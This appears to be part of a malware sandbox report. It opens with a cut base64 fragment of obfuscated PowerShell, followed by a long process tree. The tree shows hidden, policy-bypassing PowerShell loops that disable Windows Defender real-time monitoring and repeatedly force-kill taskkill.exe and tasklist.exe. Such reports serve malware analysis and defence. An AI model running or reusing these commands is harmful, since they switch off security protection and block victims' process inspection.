wAnAGsAcABuAGcAJwArACcAVgB0AAoAJwArACcAUwB0AGEAcgB0AC0AUAByAG8AJwArACcAYwBlAHMAcwAnACsAJwAgAC0ARgBpAGwAZQAnACsAJwBQAGEAdABoACAAawBwAG4AJwArACcAcABvAHcAZQByAHMAaABlAGwAJwArACcAbAAuAGUAeABlACcAKwAnAGsAcAAnACsAJwBuACAALQBBAHIAZwAnACsAJwB1AG0AZQAnACsAJwBuACcAKwAnAHQATABpAHMAdAAnACsAJwAgAGcAVgB0AC0AZQBwACAAJwArACcAYgB5AHAAJwArACcAYQBzACcAKwAnAHMAIAAnACsAJwAtAHcAIABoAGkAZABkAGUAbgAnACsAJwAgAC0AJwArACcAYwAgAGsAcAAnACsAJwBuACcAKwAnAHcAaABpAGwAZQAoAEgASwBpAHQAcgAnACsAJwB1AGUAKQB7ACcAKwAnACAAdABhAHMAawBrAGkAbABsACAAJwArACcALwBmACcAKwAnACAAJwArACcALwAnACsAJwBpAG0AIABjAG0AZAAuAGUAeABlAH0AJwArACcAawBwAG4AZwBWAHQACgBTACcAKwAnAHQAJwArACcAYQByACcAKwAnAHQALQAnACsAJwBQAHIAbwAnACsAJwBjAGUAcwAnACsAJwBzACAALQBGAGkAbAAnACsAJwBlAFAAYQAnACsAJwB0AGgAJwArACcAIABrAHAAbgBwAG8AdwBlAHIAcwBoAGUAbABsACcAKwAnAC4AZQB4AGUAawAnACsAJwBwAG4AIAAtACcAKwAnAEEAJwArACcAcgBnAHUAJwArACcAbQBlAG4AdAAnACsAJwBMAGkAcwAnACsAJwB0ACAAZwBWAHQALQBlAHAAIABiAHkAcABhAHMAJwArACcAcwAnACsAJwAgAC0AJwArACcAdwAgAGgAaQBkAGQAJwArACcAZQBuACAALQBjACcAKwAnACAAJwArACcAawAnACsAJwBwAG4AdwAnACsAJwBoAGkAbAAnACsAJwBlACgASABLAGkAdAByAHUAZQApACcAKwAnAHsAJwArACcAIAB0AGEAcwBrAGsAaQBsAGwAJwArACcAIAAnACsAJwAvAGYAIAAvAGkAbQAnACsAJwAgAHAAcwAuACcAKwAnAGUAJwArACcAeAAnACsAJwBlAH0AawBwAG4AZwBWAHQAJwApACAAIAAtAEMAcgBFAHAAbABBAGMARQAnAGcAVgB0ACcALABbAEMASABBAHIAXQAzADkAIAAtAHIARQBQAGwAQQBDAEUAIAAoAFsAQwBIAEEAcgBdADcAMgArAFsAQwBIAEEAcgBdADcANQArAFsAQwBIAEEAcgBdADEAMAA1ACkALABbAEMASABBAHIAXQAzADYAIAAtAHIARQBQAGwAQQBDAEUAJwBrAHAAbgAnACwAWwBDAEgAQQByAF0AMwA0ACkAIAB8ACAAJgAgACgAIAAkAHYARQByAGIAbwBTAEUAUAByAEUAZgBFAFIAZQBuAEMARQAuAHQAbwBzAHQAcgBpAE4AZwAoACkAWwAxACwAMwBdACsAJwB4ACcALQBKAG8ASQBOACcAJwApAAoA
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3504
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "while($true){ Set-MpPreference -DisableRealtimeMonitoring $true }"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2788
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "while($true){ taskkill /f /im taskkill.exe}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4568
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4136
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4496
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:1556
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3788
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3660
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4812
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4464
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3624
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3620
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4928
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2824
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2168
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4504
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3832
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3700
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:1412
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4140
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3260
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3020
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3852
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:1768
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:5088
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4988
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3820
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3140
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3732
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2764
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4180
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4232
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3104
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4796
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3168
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3876
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3760
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:5012
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2188
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2256
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:1760
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4500
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3076
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2884
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2076
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3232
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:1716
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3136
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3720
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      Kills process with taskkill
      PID:3356
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2104
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3832
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2356
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2024
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4180
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4828
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3744
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:1532
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4284
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3720
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2168
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4228
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3672
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4224
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4464
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3936
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2808
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3120
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4644
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3356
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4336
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4760
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3660
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3232
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4056
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2000
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:5092
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4132
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4376
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4020
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:1216
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:1248
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3016
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      Kills process with taskkill
      PID:3916
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3980
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3724
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4284
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4452
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2168
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4228
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:1728
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4888
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3176
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:268
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4928
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:1688
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:800
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4020
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3908
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2044
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:348
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4956
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3104
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2672
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4644
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3184
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2580
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4224
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:1728
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3152
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3852
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5036
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:620
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3192
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:1684
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3572
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4840
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4052
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3856
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3924
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      Kills process with taskkill
      PID:4028
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2708
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4080
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3768
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3784
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3616
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4896
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3424
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2692
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:5092
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2248
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2764
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:788
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:5056
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4688
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3612
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:5076
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4724
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4412
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      Kills process with taskkill
      PID:1116
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:1260
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3068
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:2452
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:4976
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3692
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3728
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
      4⤵
      PID:3188
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "while($true){ taskkill /f /im tasklist.exe}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2568
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:5036
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4528
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3200
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3672
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3892
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4300
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3108
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4820
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3152
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3840
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2732
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4248
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4404
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:5092
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2860
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4336
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4784
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1104
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1972
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4260
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3116
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3168
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1540
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4704
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:5100
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:5024
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4324
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3196
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4148
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3776
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3792
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3892
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4416
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3108
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4112
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4840
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3960
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2936
